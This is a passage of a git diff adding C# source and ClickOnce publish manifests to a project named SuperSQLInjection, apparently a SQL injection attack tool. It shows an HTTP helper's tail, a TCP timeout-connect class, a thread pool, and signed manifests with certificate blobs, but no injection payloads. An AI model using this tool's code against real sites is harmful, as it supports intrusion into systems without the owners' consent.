+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (sr != null)
+ {
+ sr.Close();
+ }
+ if (response != null)
+ {
+ response.Close();
+ }
+ if (request != null)
+ {
+ request.Abort();
+ }
+ }
+ return html;
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/tools/http/TimeOutSocket.cs b/SuperSQLInjection/tools/http/TimeOutSocket.cs
new file mode 100644
index 0000000..cf29be5
--- /dev/null
+++ b/SuperSQLInjection/tools/http/TimeOutSocket.cs
@@ -0,0 +1,72 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Net;
+using System.Net.Sockets;
+using System.Text;
+using System.Threading;
+
+namespace SuperSQLInjection.tools.http
+{
+ class TimeOutSocket
+ {
+ private bool IsConnectionSuccessful = false;
+ private Exception socketexception =null;
+ private ManualResetEvent TimeoutObject = new ManualResetEvent(false);
+ public int useTime = 0;
+ public TcpClient Connect(String host,int port,int timeoutMSec)
+ {
+ Stopwatch sw = new Stopwatch();
+ sw.Start();
+ TimeoutObject.Reset();
+ socketexception = null;
+
+ TcpClient tcpclient = new TcpClient();
+
+ tcpclient.BeginConnect(host, port,new AsyncCallback(CallBackMethod), tcpclient);
+
+
+ if (TimeoutObject.WaitOne(timeoutMSec, false))
+ {
+ if (IsConnectionSuccessful)
+ {
+ sw.Stop();
+ useTime = (int)sw.ElapsedMilliseconds;
+ return tcpclient;
+ }
+ else
+ {
+ throw socketexception;
+ }
+ }
+ else
+ {
+ tcpclient.Close();
+ throw new TimeoutException("TimeOut Exception");
+ }
+ }
+ private void CallBackMethod(IAsyncResult asyncresult)
+ {
+ try
+ {
+ IsConnectionSuccessful = false;
+ TcpClient tcpclient = asyncresult.AsyncState as TcpClient;
+
+ if (tcpclient.Client != null)
+ {
+ tcpclient.EndConnect(asyncresult);
+ IsConnectionSuccessful = true;
+ }
+ }
+ catch (Exception ex)
+ {
+ IsConnectionSuccessful = false;
+ socketexception = ex;
+ }
+ finally
+ {
+ TimeoutObject.Set();
+ }
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/thread/MyThreadPool.cs b/SuperSQLInjection/tools/thread/MyThreadPool.cs
new file mode 100644
index 0000000..e6ff423
--- /dev/null
+++ b/SuperSQLInjection/tools/thread/MyThreadPool.cs
@@ -0,0 +1,134 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Threading;
+using tools;
+using System.Collections;
+
+namespace SuperSQLInjection.tools
+{
+ class MyThreadPool
+ {
+ public static int maxThread = 1;
+ public static String tname = "ThreadPool-";
+ public static ArrayList threads = new ArrayList();
+ public static Thread cth = null;
+ public static AutoResetEvent _autoResetEvent = new AutoResetEvent(true);
+ public static void setMaxThread(int maxTh)
+ {
+ maxThread = maxTh;
+ cth = new Thread(clearThread);
+ cth.Start();
+
+ }
+ public static int getCurrentThreadCount()
+ {
+ return threads.Count;
+
+ }
+
+ public static void clearThread()
+ {
+ while (true)
+ {
+ lock (threads.SyncRoot)
+ {
+ for (int i = 0; i < threads.Count; i++)
+ {
+
+ if (threads.Count <= 0)
+ {
+
+ break;
+ }
+ Thread cth = (Thread)threads[i];
+ if (cth.IsAlive == false)
+ {
+ threads.Remove(cth);
+ _autoResetEvent.Set();
+ }
+ }
+ }
+ Thread.Sleep(10);
+ }
+ }
+
+ public static void killAllThread()
+ {
+
+ lock (threads.SyncRoot)
+ {
+ for (int i = 0; i < threads.Count; i++)
+ {
+
+ if (threads.Count <= 0)
+ {
+
+ break;
+ }
+
+ Thread cth = (Thread)threads[i];
+ cth.Abort();
+ }
+ }
+ }
+
+ public static void initThread(ParameterizedThreadStart ps, Object obj, String name)
+ {
+ while (Main.status == 1)
+ {
+ if (threads.Count < maxThread && Main.status == 1)
+ {
+ Thread th = new Thread(ps);
+ th.Name = tname ;
+ th.IsBackground = true;
+ lock (threads.SyncRoot)
+ {
+ threads.Add(th);
+ }
+
+ th.Start(obj);
+ break;
+ }
+ _autoResetEvent.WaitOne();
+ }
+ }
+
+ public static void initThread(ParameterizedThreadStart ps, Object obj)
+ {
+ while (Main.status == 1)
+ {
+ if (threads.Count < maxThread && Main.status == 1)
+ {
+ Thread th = new Thread(ps);
+ th.IsBackground = true;
+ th.Name = tname;
+ lock (threads.SyncRoot)
+ {
+ threads.Add(th);
+ }
+ th.Start(obj);
+ break;
+ }
+ Thread.Sleep(10);
+ }
+ }
+
+ public static int GetAliveThreadsCount()
+ {
+
+ /*
+ foreach (Thread th in threads)
+ {
+ if (th.IsAlive)
+ {
+ count++;
+
+ }
+ }*/
+ return threads.Count;
+ }
+
+ }
+
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.application b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.application
new file mode 100644
index 0000000..dc7e66f
--- /dev/null
+++ b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.application
@@ -0,0 +1,21 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ gAs/TyknF/4dNgKirgeCy0VQSBk=
+
+
+
+oaT56oKuR3alD/PZ79QRFQqsr/4=qMuGCX/i2pzV4msE+YGr7UxOYPngnpJZR2tYM6X2g0xMFU1afxsbf+XYJm2dZQYMQGx1jrnJqvssyWSkLYMNojXyDq6k/3TvcM/t/s2ZvJCz/GWXQckrvMejD2OHukR7ETyctizeIuWXgvQGyYZXG1jY+nB2hYI/h8tYxtv8W78=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABCN=DESKTOP-T009CQE\shack2m6wWY1yfDMQPe+z3uaqSAkxql5U=gYBpuAu5h+mOxWNHvJ/yAPmde9Z0iKr4f2TTQqrWb8IZHqt8zJYfxi0Kh7PLFaf+lNrnbCyM/nQLKK7HBHifVRKIjCNJ9Po9utzrhylLj32I+2dnLd6+tjrH8v19U2rGdJ/aHeppWuSqwzUVnJ3oqbpjnNbmYaogdNCE9SVx/Jw=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABMIIB8TCCAVqgAwIBAgIQTPcc6oMYorxGRkGiNt4vdDANBgkqhkiG9w0BAQUFADA3MTUwMwYDVQQDHiwARABFAFMASwBUAE8AUAAtAFQAMAAwADkAQwBRAEUAXABzAGgAYQBjAGsAMjAeFw0xNjAxMDUwNzA2MjVaFw0xNzAxMDQxMzA2MjVaMDcxNTAzBgNVBAMeLABEAEUAUwBLAFQATwBQAC0AVAAwADAAOQBDAFEARQBcAHMAaABhAGMAawAyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8ajhBRaB8Y3sT9/MWrI12BwbqKvOevWzRzQpPv1VDHJkAmtwDU4/1eVM0zWdWo3jHLosrssHHf3PFDpqHm956/FaTB4JM+p4PBDDzcxAdV69S08bMcxlMBXAysDjD7sU6GqTFaYydpYc6OO5un2afpJT6e5v+Y2JtfnCdJ7eMnQIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAI20fV7Nk6dDe58PeVtblLeUBUBypvhh3ddnU6uO3+Fwv4KorSto6qtFq9uyzY/lPP/u5SQZmVBiZG7pK6vGfDhBt7PAtNoLgzsp7/wXXze7a8IwsAm8gmK0wmYtXK9IvS17UikTNWn9OS73AfvpR8SuzxPnvymkYBG2bsPqmRaj
\ No newline at end of file
diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.config.deploy b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.config.deploy
new file mode 100644
index 0000000..e365603
--- /dev/null
+++ b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.config.deploy
@@ -0,0 +1,3 @@
+
+
+
diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.deploy b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.deploy
new file mode 100644
index 0000000..853ecdb
Binary files /dev/null and b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.deploy differ
diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.manifest b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.manifest
new file mode 100644
index 0000000..a5963b5
--- /dev/null
+++ b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.manifest
@@ -0,0 +1,81 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ MzoAOL5R6lPkke3HWwU+tccy9LI=
+
+
+
+
+
+
+
+
+
+ cpzNzlRjZspwKGLNlX6RAlU3880=
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+DggssPaMqM6CqgARrCO/pDw3Jfg=CTJF8DGXtEUhTfOmyO6oSrA40dGK9leO1ikDrxcwkL5xNZJyt73X/hfNiOfbK+Q0cQ4sQzALzgOgKb3LFneBb4MusIuwffTGkKbD6apSydOT1zT7pVkQiqyIXJfvKIF0j7PKcipmsrXnWJ+Ry6r8k0GPW9rsKiFI3WZTysJJHK8=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABCN=DESKTOP-T009CQE\shack2ELRpYqKy1OdgqVm1x1O5nixOwFA=EBm3PkvOqz/o/WnwEbAYz0rh3d7sTDvoJ/3LcCNOGIebqrMO2d1b+mUaMzMeHDmmKx93K2XqjebOqFhtrwLwg+0z6WMtvXGTBJjb+he5H/evWw3K+OYLGXsEogyGtNiVO8QyyUGn+C3vZSIJ2g2cAj45UBB/wVhLxT3Wr6F+OF8=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABMIIB8TCCAVqgAwIBAgIQTPcc6oMYorxGRkGiNt4vdDANBgkqhkiG9w0BAQUFADA3MTUwMwYDVQQDHiwARABFAFMASwBUAE8AUAAtAFQAMAAwADkAQwBRAEUAXABzAGgAYQBjAGsAMjAeFw0xNjAxMDUwNzA2MjVaFw0xNzAxMDQxMzA2MjVaMDcxNTAzBgNVBAMeLABEAEUAUwBLAFQATwBQAC0AVAAwADAAOQBDAFEARQBcAHMAaABhAGMAawAyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8ajhBRaB8Y3sT9/MWrI12BwbqKvOevWzRzQpPv1VDHJkAmtwDU4/1eVM0zWdWo3jHLosrssHHf3PFDpqHm956/FaTB4JM+p4PBDDzcxAdV69S08bMcxlMBXAysDjD7sU6GqTFaYydpYc6OO5un2afpJT6e5v+Y2JtfnCdJ7eMnQIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAI20fV7Nk6dDe58PeVtblLeUBUBypvhh3ddnU6uO3+Fwv4KorSto6qtFq9uyzY/lPP/u5SQZmVBiZG7pK6vGfDhBt7PAtNoLgzsp7/wXXze7a8IwsAm8gmK0wmYtXK9IvS17UikTNWn9OS73AfvpR8SuzxPnvymkYBG2bsPqmRaj
\ No newline at end of file
diff --git a/SuperSQLInjection/发布/SuperSQLInjection.application b/SuperSQLInjection/发布/SuperSQLInjection.application
new file mode 100644
index 0000000..dc7e66f
--- /dev/null
+++ b/SuperSQLInjection/发布/SuperSQLInjection.application
@@ -0,0 +1,21 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ gAs/TyknF/4dNgKirgeCy0VQSBk=
+
+
+
+oaT56oKuR3alD/PZ79QRFQqsr/4=qMuGCX/i2pzV4msE+YGr7UxOYPngnpJZR2tYM6X2g0xMFU1afxsbf+XYJm2dZQYMQGx1jrnJqvssyWSkLYMNojXyDq6k/3TvcM/t/s2ZvJCz/GWXQckrvMejD2OHukR7ETyctizeIuWXgvQGyYZXG1jY+nB2hYI/h8tYxtv8W78=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABCN=DESKTOP-T009CQE\shack2m6wWY1yfDMQPe+z3uaqSAkxql5U=gYBpuAu5h+mOxWNHvJ/yAPmde9Z0iKr4f2TTQqrWb8IZHqt8zJYfxi0Kh7PLFaf+lNrnbCyM/nQLKK7HBHifVRKIjCNJ9Po9utzrhylLj32I+2dnLd6+tjrH8v19U2rGdJ/aHeppWuSqwzUVnJ3oqbpjnNbmYaogdNCE9SVx/Jw=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABMIIB8TCCAVqgAwIBAgIQTPcc6oMYorxGRkGiNt4vdDANBgkqhkiG9w0BAQUFADA3MTUwMwYDVQQDHiwARABFAFMASwBUAE8AUAAtAFQAMAAwADkAQwBRAEUAXABzAGgAYQBjAGsAMjAeFw0xNjAxMDUwNzA2MjVaFw0xNzAxMDQxMzA2MjVaMDcxNTAzBgNVBAMeLABEAEUAUwBLAFQATwBQAC0AVAAwADAAOQBDAFEARQBcAHMAaABhAGMAawAyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8ajhBRaB8Y3sT9/MWrI12BwbqKvOevWzRzQpPv1VDHJkAmtwDU4/1eVM0zWdWo3jHLosrssHHf3PFDpqHm956/FaTB4JM+p4PBDDzcxAdV69S08bMcxlMBXAysDjD7sU6GqTFaYydpYc6OO5un2afpJT6e5v+Y2JtfnCdJ7eMnQIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAI20fV7Nk6dDe58PeVtblLeUBUBypvhh3ddnU6uO3+Fwv4KorSto6qtFq9uyzY/lPP/u5SQZmVBiZG7pK6vGfDhBt7PAtNoLgzsp7/wXXze7a8IwsAm8gmK0wmYtXK9IvS17UikTNWn9OS73AfvpR8SuzxPnvymkYBG2bsPqmRaj
\ No newline at end of file